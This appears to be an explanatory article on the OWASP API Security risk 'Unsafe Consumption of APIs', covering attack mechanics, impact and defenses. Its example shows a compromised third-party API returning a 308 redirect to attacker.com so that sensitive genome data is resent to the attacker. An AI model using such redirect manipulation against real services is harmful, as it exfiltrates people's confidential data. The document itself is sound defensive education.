OWASP rating (API Specific): Exploitability Easy; Prevalence Common; Detectability Average; Technical Impact Severe; Business Impact: Specific (application-specific). OWASP notes that exploitation requires attackers to identify, and potentially compromise, other APIs/services integrated by the target API - this information is usually not publicly available, and the integrated services are not easily attackable.
How the Attack Works
The attack is directed not at the target API directly, but at the trust path between the target API and the third-party APIs it integrates.
Because developers tend to trust incoming data from third parties instead of checking it, validation and sanitization of the returned data are often missing before it is processed or passed on to downstream components (e.g. a database).
According to OWASP, an API is potentially vulnerable if it:
- communicates with other APIs over unencrypted channels.
- blindly follows redirects.
- does not limit the amount of resources used to process third-party responses.
- sets no timeouts for such interactions.
To do this, the attacker has to identify and, if necessary, compromise the integrated services (data sources), or feed them crafted content. The manipulated response is then processed unchecked by the trusting target API.
Blind trust in third-party APIs transfers their risk.
Example
OWASP Scenario 2 (blindly following redirects, leading to data exfiltration):
- An API integrates a third party to securely store sensitive medical user data. It sends the following request over a secured connection:
POST /user/store_phr_record { "genome": "ACTAGTAG__TTGADDAAIICCTT..." } - Attackers find a way to compromise the third-party API. It now responds to such requests with a redirect:
HTTP/1.1 308 Permanent Redirect Location: https://attacker.com/ - Because the target API blindly follows the third party's redirects, it repeats the exact same request - including the sensitive user data - this time to the attacker's server instead. The confidential health data thereby ends up with the attacker.
Impact
The impact depends on what the target API does with the fetched data.
Successful exploitation can lead to:
- disclosure of sensitive information to unauthorized actors.
- various kinds of injection attacks (e.g. SQL injection).
- denial of service.
The technical impact is rated "Severe" by OWASP. The business impact is application-specific ("Specific").
How to Protect Yourself
- When selecting service providers/third parties, assess their API security posture.
- Handle all API interactions over a secure communication channel (TLS).
- Always validate and properly sanitize data received from integrated APIs before using it.
- Maintain an allowlist of known, permitted destinations that integrated APIs may redirect to - never blindly follow redirects.
- (Derivable from the 'Is the API Vulnerable?' section, not listed in the 'How To Prevent' section) Limit the amount of resources used to process third-party responses and implement timeouts for interactions with third-party services.
Sources
- API10:2023 Unsafe Consumption of APIs - OWASP API Security Top 10 (2023 Edition) OWASP API Security Project, 2023